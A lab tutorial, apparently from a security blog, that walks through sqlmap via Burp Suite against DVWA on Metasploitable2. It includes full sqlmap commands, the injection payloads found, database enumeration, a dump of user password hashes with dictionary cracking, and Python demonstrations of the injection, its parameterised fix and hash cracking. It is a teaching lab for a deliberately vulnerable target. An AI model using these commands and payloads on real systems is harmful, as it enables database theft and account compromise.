sqlmap

sqlmap: automatic SQL injection and database takeover tool

An open-source assessment tool specialised in SQL injection.

Start Metasploitable2 Linux


Start Burp Suite from Kali Linux

root@kali:~# burpsuite


Under [Proxy] → [Options], confirm that the proxy listener is bound to localhost (127.0.0.1) on port 8080. Reference: earlier post, Burp Suite


Check [Proxy] → [Intercept]; if it shows [Intercept is on], click it to switch to [Intercept is off] for now.

Browser proxy settings

Change the browser's proxy settings so that it connects through the local proxy (Burp Suite). In Kali's browser (Firefox), click [Open menu] at the top right → [Preferences], then open [Network Proxy] at the very bottom of the page.


Select [Manual proxy configuration], confirm HTTP Proxy: 127.0.0.1, Port: 8080, and click "OK" to close the dialog. Close the [Preferences] page as well.


DVWA

Set DVWA's Security Level to low and open the SQL Injection page.

If the browser shows "Unable to connect", the proxy settings are probably wrong. Recheck them.

Switch Burp Suite's Intercept from off to [Intercept is on].

Back in the browser, enter 1 for User ID and click [Submit]. The request is intercepted and held by Burp Suite, so the page does not change.


Back in Burp Suite, the captured request is displayed. sqlmap will need the value of the Cookie header (security=low and PHPSESSID), so copy it and save it somewhere. Keep in mind that PHPSESSID is a live session token: if you log out of DVWA or the session expires, sqlmap's requests are redirected to the login page and the scan finds nothing, so capture a fresh value if that happens. (Alternatively, save the whole intercepted request to a file and hand it to sqlmap with -r; that carries the URL, cookies and other headers along without any copy-pasting.)


Once saved, click [Forward] to let this request through.


The request went through and the data is displayed as usual.

Switch [Intercept is on] back to [Intercept is off] so that capturing stops.


sqlmap

Open a new terminal and run the command below (adjust the parameters to your own environment).

root@kali:~# sqlmap -u "http://192.168.56.105/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --proxy="http://127.0.0.1:8080" --cookie="security=low; PHPSESSID=571e31e0458c5bdb45e6e63e001bfbf7" --dbs


Questions come up here and there; answer Y (Yes), then wait a while. (Answering by hand is optional: --batch makes sqlmap take the default answer to every prompt. Also, because --proxy sends the traffic through Burp Suite, all 3290 requests of this run show up in Burp's HTTP history, which is handy for seeing exactly what sqlmap sends but slows the scan down; drop --proxy when you only need the result.)

        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.3.10#stable}
|_ -| . [.]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 22:52:00 /2019-10-27/

[22:52:00] [INFO] testing connection to the target URL
[22:52:00] [INFO] checking if the target is protected by some kind of WAF/IPS
[22:52:00] [INFO] testing if the target URL content is stable
[22:52:01] [INFO] target URL content is stable
[22:52:01] [INFO] testing if GET parameter 'id' is dynamic
[22:52:01] [WARNING] GET parameter 'id' does not appear to be dynamic
[22:52:01] [INFO] heuristics detected web page charset 'ascii'
[22:52:01] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[22:52:01] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[22:52:01] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
 ~(omitted)~
[23:05:38] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[23:05:40] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[23:05:52] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[23:06:04] [WARNING] GET parameter 'Submit' does not seem to be injectable
sqlmap identified the following injection point(s) with a total of 3290 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: id=1' OR NOT 5331=5331#&Submit=Submit

    Type: error-based
    Title: MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND ROW(8931,1249)>(SELECT COUNT(*),CONCAT(0x717a627871,(SELECT (ELT(8931=8931,1))),0x717a6b7171,FLOOR(RAND(0)*2))x FROM (SELECT 6706 UNION SELECT 1852 UNION SELECT 1647 UNION SELECT 5861)a GROUP BY x)-- dPtg&Submit=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 1244 FROM (SELECT(SLEEP(5)))rLxE)-- hfJy&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=1' UNION ALL SELECT CONCAT(0x717a627871,0x764f557a54517648536376706a4a4b7441767955477347466868636b584371666d514e426c487a44,0x717a6b7171),NULL#&Submit=Submit
---
[23:06:04] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 4.1
[23:06:04] [INFO] fetching database names
available databases [7]:
[*] dvwa
[*] information_schema
[*] metasploit
[*] mysql
[*] owasp10
[*] tikiwiki
[*] tikiwiki195

[23:06:04] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.56.105'

[*] ending @ 23:06:04 /2019-10-27/

The list of databases is displayed.
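As an added example that is not part of the original post, the following Python script reproduces in SQLite the behaviour behind two of the injection points sqlmap reported above (the boolean-based blind payload and the UNION query) and shows the parameterised query that closes the hole. It assumes, as DVWA's low level does, that the page builds its query by string concatenation. The users table is constructed here (the first and last names are made up; the user names and hashes are the ones sqlmap dumps later in this post), MySQL's '#' comment terminator is replaced by SQLite's '-- ', and the time-based and error-based cases are left out because SQLite has neither SLEEP() nor the FLOOR(RAND()) error trick.

```python
"""Added example: why sqlmap's payloads against DVWA (low) work, in SQLite.

Assumption: the page builds its SQL by string concatenation, roughly
  SELECT first_name, last_name FROM users WHERE user_id = '$id'
The users rows are constructed for this example; names are made up, the
hashes are the ones sqlmap dumped. MySQL's '#' comment becomes SQLite's '-- '.
"""
import sqlite3

# Constructed sample rows: the five user names and MD5 hashes from the dump.
USERS = [
    (1, "admin",   "admin",  "admin",   "5f4dcc3b5aa765d61d8327deb882cf99"),
    (2, "gordonb", "Gordon", "Brown",   "e99a18c428cb38d5f260853678922e03"),
    (3, "1337",    "Hack",   "Me",      "8d3533d75ae2c3966d7e0d4fcc69216b"),
    (4, "pablo",   "Pablo",  "Picasso", "0d107d09f5bbe40cade3de5c71e9e9b7"),
    (5, "smithy",  "Bob",    "Smith",   "5f4dcc3b5aa765d61d8327deb882cf99"),
]


def make_db():
    """In-memory stand-in for dvwa.users with the same six column names."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE users (user_id INTEGER, user TEXT, first_name TEXT,"
        " last_name TEXT, password TEXT, avatar TEXT)"
    )
    con.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?, NULL)", USERS)
    return con


def lookup_vulnerable(con, user_id):
    """DVWA-low style: the attacker's string is pasted into the SQL text."""
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return con.execute(sql).fetchall()


def lookup_fixed(con, user_id):
    """Hardened form: the value is bound as data, never parsed as SQL."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return con.execute(sql, (user_id,)).fetchall()


# Payloads in the shape sqlmap reported, with '#' swapped for SQLite's '-- '.
BLIND_FALSE = "1' OR NOT 5331=5331-- "   # OR (false): only user_id 1 matches
BLIND_TRUE = "1' OR NOT 5331=5332-- "    # OR (true): every row matches
UNION = "1' UNION ALL SELECT user, password FROM users-- "  # 2 columns, as reported


def demo():
    """Run each payload through both implementations and collect the results."""
    con = make_db()
    return {
        "normal": lookup_vulnerable(con, "1"),
        # Blind detection: the page differs between a true and a false condition.
        "blind_false_rows": len(lookup_vulnerable(con, BLIND_FALSE)),
        "blind_true_rows": len(lookup_vulnerable(con, BLIND_TRUE)),
        # UNION: the second SELECT's rows ride along in the same result set.
        "union": lookup_vulnerable(con, UNION),
        # Parameterised query: the same strings are just non-matching values.
        "fixed_blind_true": lookup_fixed(con, BLIND_TRUE),
        "fixed_union": lookup_fixed(con, UNION),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The blind case is what sqlmap's "boolean-based blind" finding means: the page content differs between a true and a false condition (here one row versus five), and that one bit per request is enough to read the database out over the 3290 requests seen above. The UNION case shows why the 2-column UNION payload in the report is far cheaper: the extra rows arrive in the same response. With the bound parameter, both strings are compared as values against user_id and match nothing.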

Prompts in the omitted part of the output

Besides the two questions shown above, the omitted portion of the run contains a warning and two more prompts (all answered y here):

[WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n]

Note that the default for the second prompt is N; answering y is why the log above also reports testing the 'Submit' parameter.

Heuristics - Wikipedia

Inspect the tables in the dvwa database

Pick one of the listed databases (dvwa) and inspect its tables.

root@kali:~# sqlmap -u "http://192.168.56.105/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --proxy="http://127.0.0.1:8080" --cookie="security=low; PHPSESSID=571e31e0458c5bdb45e6e63e001bfbf7" -D dvwa --tables
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.3.10#stable}
|_ -| . [.]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 23:25:27 /2019-10-27/

[23:25:27] [INFO] resuming back-end DBMS 'mysql' 
[23:25:27] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: id=1' OR NOT 5331=5331#&Submit=Submit

    Type: error-based
    Title: MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND ROW(8931,1249)>(SELECT COUNT(*),CONCAT(0x717a627871,(SELECT (ELT(8931=8931,1))),0x717a6b7171,FLOOR(RAND(0)*2))x FROM (SELECT 6706 UNION SELECT 1852 UNION SELECT 1647 UNION SELECT 5861)a GROUP BY x)-- dPtg&Submit=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 1244 FROM (SELECT(SLEEP(5)))rLxE)-- hfJy&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=1' UNION ALL SELECT CONCAT(0x717a627871,0x764f557a54517648536376706a4a4b7441767955477347466868636b584371666d514e426c487a44,0x717a6b7171),NULL#&Submit=Submit
---
[23:25:27] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 4.1
[23:25:27] [INFO] fetching tables for database: 'dvwa'
[23:25:28] [WARNING] reflective value(s) found and filtering out
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users     |
+-----------+

[23:25:28] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.56.105'

[*] ending @ 23:25:28 /2019-10-27/

dvwa has two tables, [guestbook] and [users].

Inspect the column names of a table

Inspect the column names of the [users] table.

root@kali:~# sqlmap -u "http://192.168.56.105/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --proxy="http://127.0.0.1:8080" --cookie="security=low; PHPSESSID=571e31e0458c5bdb45e6e63e001bfbf7" -D dvwa -T users --columns
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.3.10#stable}
|_ -| . [.]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 23:33:14 /2019-10-27/

[23:33:14] [INFO] resuming back-end DBMS 'mysql' 
[23:33:14] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: id=1' OR NOT 5331=5331#&Submit=Submit

    Type: error-based
    Title: MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND ROW(8931,1249)>(SELECT COUNT(*),CONCAT(0x717a627871,(SELECT (ELT(8931=8931,1))),0x717a6b7171,FLOOR(RAND(0)*2))x FROM (SELECT 6706 UNION SELECT 1852 UNION SELECT 1647 UNION SELECT 5861)a GROUP BY x)-- dPtg&Submit=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 1244 FROM (SELECT(SLEEP(5)))rLxE)-- hfJy&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=1' UNION ALL SELECT CONCAT(0x717a627871,0x764f557a54517648536376706a4a4b7441767955477347466868636b584371666d514e426c487a44,0x717a6b7171),NULL#&Submit=Submit
---
[23:33:14] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 4.1
[23:33:14] [INFO] fetching columns for table 'users' in database 'dvwa'
[23:33:14] [WARNING] reflective value(s) found and filtering out
Database: dvwa
Table: users
[6 columns]
+------------+-------------+
| Column     | Type        |
+------------+-------------+
| user       | varchar(15) |
| avatar     | varchar(70) |
| first_name | varchar(15) |
| last_name  | varchar(15) |
| password   | varchar(32) |
| user_id    | int(6)      |
+------------+-------------+

[23:33:14] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.56.105'

[*] ending @ 23:33:14 /2019-10-27/

The column names of the users table are displayed.

Dump the user and password columns

root@kali:~# sqlmap -u "http://192.168.56.105/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --proxy="http://127.0.0.1:8080" --cookie="security=low; PHPSESSID=571e31e0458c5bdb45e6e63e001bfbf7" -D dvwa -T users -C user,password --dump
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.3.10#stable}
|_ -| . [.]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 23:39:58 /2019-10-27/

[23:39:58] [INFO] resuming back-end DBMS 'mysql' 
[23:39:58] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: id=1' OR NOT 5331=5331#&Submit=Submit

    Type: error-based
    Title: MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND ROW(8931,1249)>(SELECT COUNT(*),CONCAT(0x717a627871,(SELECT (ELT(8931=8931,1))),0x717a6b7171,FLOOR(RAND(0)*2))x FROM (SELECT 6706 UNION SELECT 1852 UNION SELECT 1647 UNION SELECT 5861)a GROUP BY x)-- dPtg&Submit=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 1244 FROM (SELECT(SLEEP(5)))rLxE)-- hfJy&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=1' UNION ALL SELECT CONCAT(0x717a627871,0x764f557a54517648536376706a4a4b7441767955477347466868636b584371666d514e426c487a44,0x717a6b7171),NULL#&Submit=Submit
---
[23:39:59] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 4.1
[23:39:59] [INFO] fetching entries of column(s) '`user`, password' for table 'users' in database 'dvwa'
[23:39:59] [INFO] heuristics detected web page charset 'ascii'
[23:39:59] [WARNING] something went wrong with full UNION technique (could be because of limitation on retrieved number of entries). Falling back to partial UNION technique
[23:39:59] [INFO] used SQL query returns 5 entries
[23:39:59] [INFO] resumed: '1337','8d3533d75ae2c3966d7e0d4fcc69216b'
[23:39:59] [INFO] resumed: 'admin','5f4dcc3b5aa765d61d8327deb882cf99'
[23:39:59] [INFO] resumed: 'gordonb','e99a18c428cb38d5f260853678922e03'
[23:39:59] [INFO] resumed: 'pablo','0d107d09f5bbe40cade3de5c71e9e9b7'
[23:39:59] [INFO] resumed: 'smithy','5f4dcc3b5aa765d61d8327deb882cf99'
[23:39:59] [INFO] recognized possible password hashes in column 'password'                                             
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[23:40:00] [INFO] writing hashes to a temporary file '/tmp/sqlmaphrU0aF2670/sqlmaphashes-X66Wfy.txt' 
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[23:40:02] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1 (enter 1, or just press Enter)
[23:40:06] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] y
[23:40:10] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[23:40:10] [INFO] starting 2 processes 
[23:40:15] [INFO] cracked password 'abc123' for hash 'e99a18c428cb38d5f260853678922e03'                                
[23:40:15] [INFO] cracked password 'charley' for hash '8d3533d75ae2c3966d7e0d4fcc69216b'                               
[23:40:22] [INFO] cracked password 'password' for hash '5f4dcc3b5aa765d61d8327deb882cf99'                              
[23:40:27] [INFO] cracked password 'letmein' for hash '0d107d09f5bbe40cade3de5c71e9e9b7'                               
Database: dvwa                                                                                                         
Table: users
[5 entries]
+---------+---------------------------------------------+
| user    | password                                    |
+---------+---------------------------------------------+
| 1337    | 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  |
| admin   | 5f4dcc3b5aa765d61d8327deb882cf99 (password) |
| gordonb | e99a18c428cb38d5f260853678922e03 (abc123)   |
| pablo   | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  |
| smithy  | 5f4dcc3b5aa765d61d8327deb882cf99 (password) |
+---------+---------------------------------------------+

[23:40:36] [INFO] table 'dvwa.users' dumped to CSV file '/root/.sqlmap/output/192.168.56.105/dump/dvwa/users.csv'
[23:40:36] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.56.105'

[*] ending @ 23:40:36 /2019-10-27/

The hashes were cracked. The password column is a varchar(32) holding plain, unsalted MD5 of the password, which is why a dictionary attack finishes in seconds. Note also that admin and smithy have the identical hash 5f4dcc3b5aa765d61d8327deb882cf99: even before cracking it is obvious that they share the same password, something a per-user salt would have hidden.
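To show what sqlmap's dictionary-based cracking step does with those hashes, here is an added example in Python (not from the original post and not sqlmap's own code): it hashes each word of a constructed miniature word list, with and without common suffixes, and looks the results up against the five dumped hashes. The word list and suffix list are assumptions made for this example; the hashes are the ones in the dump above.

```python
"""Added example: the dictionary attack sqlmap ran on the dumped MD5 hashes.

The hashes are the ones dumped from dvwa.users above. WORDLIST and SUFFIXES
are constructed for this example; sqlmap's wordlist.tx_ is far larger.
"""
import hashlib

# user -> md5 hex, exactly as in the dump.
DUMPED = {
    "1337": "8d3533d75ae2c3966d7e0d4fcc69216b",
    "admin": "5f4dcc3b5aa765d61d8327deb882cf99",
    "gordonb": "e99a18c428cb38d5f260853678922e03",
    "pablo": "0d107d09f5bbe40cade3de5c71e9e9b7",
    "smithy": "5f4dcc3b5aa765d61d8327deb882cf99",
}

# Constructed miniature word list (a real run streams millions of lines).
WORDLIST = ["123456", "qwerty", "abc123", "monkey", "charley", "letmein", "password"]
# Constructed suffixes, the idea behind sqlmap's "common password suffixes" prompt.
SUFFIXES = ["", "1", "123", "!", "2019"]


def md5_hex(text):
    """Unsalted MD5 as DVWA stores it: same password, same hash for everyone."""
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def crack(hashes, wordlist, suffixes=("",)):
    """Return {hash: plaintext} for every target hash hit by word + suffix.

    Each candidate is hashed once and looked up against the whole target set,
    so with unsalted hashes N users cost the attacker no more than one user."""
    targets = set(hashes)
    found = {}
    for word in wordlist:
        for suffix in suffixes:
            candidate = word + suffix
            digest = md5_hex(candidate)
            if digest in targets and digest not in found:
                found[digest] = candidate
                if len(found) == len(targets):
                    return found
    return found


def crack_users(users=DUMPED, wordlist=WORDLIST, suffixes=SUFFIXES):
    """Map each user name to its recovered password, or None if not cracked."""
    found = crack(users.values(), wordlist, suffixes)
    return {user: found.get(digest) for user, digest in users.items()}


def shared_hashes(users):
    """Users whose stored hashes are byte-identical. Without a salt that means
    identical passwords, visible before a single guess is made."""
    by_hash = {}
    for user, digest in users.items():
        by_hash.setdefault(digest, []).append(user)
    return {digest: names for digest, names in by_hash.items() if len(names) > 1}


if __name__ == "__main__":
    for user, password in crack_users().items():
        print(f"{user}: {password}")
    print("same password:", shared_hashes(DUMPED))
```

Two properties of unsalted MD5 do the damage here: one hash computation is checked against every user at once, and equal passwords produce equal hashes, so admin and smithy are linked without any cracking. A per-user salt with a deliberately slow function (bcrypt, scrypt or Argon2) removes both shortcuts: every candidate must be hashed once per user, and each hash costs orders of magnitude more than an MD5.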


When finished, set the browser's proxy setting back to "No proxy".
